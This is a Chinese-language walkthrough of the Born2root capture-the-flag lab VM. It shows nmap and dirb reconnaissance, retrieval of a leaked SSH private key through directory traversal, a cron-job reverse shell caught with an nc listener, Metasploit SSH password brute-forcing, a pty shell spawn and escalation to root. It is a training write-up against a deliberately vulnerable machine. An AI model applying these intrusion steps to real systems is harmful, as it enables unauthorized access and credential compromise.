准备工作
- 先下载Born2root镜像并导入虚拟机,注意:本人将ova导入vmware时报了这个错误:
- 原因是OVFtools不兼容的问题,导入virtualbox解决问题!
2.安装好kali攻击机,这个自行官网下载,这里不再赘述。
漏洞复现过程
- 使用netdiscover命令发现存活主机。
netdiscover -i eth0
- 发现目标主机,开始展开攻击!
- 首先使用nmap对目标主机进行信息收集。
nmap -sV 192.168.101.31
- 发现目标主机开放了ssh端口和一些网络服务。有可能存在ssh私钥泄露等问题,进一步进行渗透。
- 使用浏览器登录,进一步进行信息收集。
- 发现了一些有用的信息,可能是目标主机的一个账户。
- 使用dirb工具进行WEB目录扫描,更加深入地进行信息挖掘。
dirb http://192.168.101.31/
-
发掘到一些目录信息,并尝试能不能从中找到flag信息。
-
首先先查找robots.txt文件,但是并没有发现有价值的信息。
-
最后打开http://192.168.101.31/icons/,发现出现了目录遍历。
-
打开VDSoyuAXiO.txt文件,发现了ssh的私钥加密信息。
- 在命令行使用wget命令将这文件下载到桌面,并重命名为id_rsa。
wget http://192.168.101.31/icons/VDSoyuAXiO.txt
- 将id_rsa权限更改为600
chmod 600 id_rsa
- 然后使用该私钥尝试登陆目标系统。
ssh -i id_rsa martin@192.168.101.31
-
成功登陆目标系统,但是发现martin账户并不属于root用户组,无法提权。
-
然后再进一步查看/etc/passwd目录,收集账户信息。
-
进入home目录后发现共有三个用户,可能可以提权。
-
再查看/etc/crontab上系统执行的周期性任务。发现jimmy账户每隔五分钟执行一遍sekurity.py文件。因此可以尝试编写py脚本反弹shell。
-
赋予脚本文件可执行的权限
- 使用nc侦听端口,并反弹shell
nc -lvp 4444
- 发现jimmy用户也不属于root用户组,提权失败。最后剩下hadi账户。
-
hadi账户只能通过ssh口令暴力破解获取其登录密钥。
在网上搜猜密码,并生成一个hadi.txt密码字典,保存在桌面即可。我使用过cupp生成,但是并不能成功破解,读者可以自行选择。 -
启动msfconsole,并加载相应模块进行漏洞利用。
msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.101.31
set username hadi
set pass_file /root/Desktop/hadi.txt
set threads 5
set verbose true
run
- 等待一段时间发现密码是hadi123。尝试登陆
sessions -i 1
- 在空白处键入该命令,获取shell字符页面
python -c "import pty; pty.spawn('/bin/bash')"
- 尝试提权,密码为hadi123
su - root
- 提权成功
- 查看flag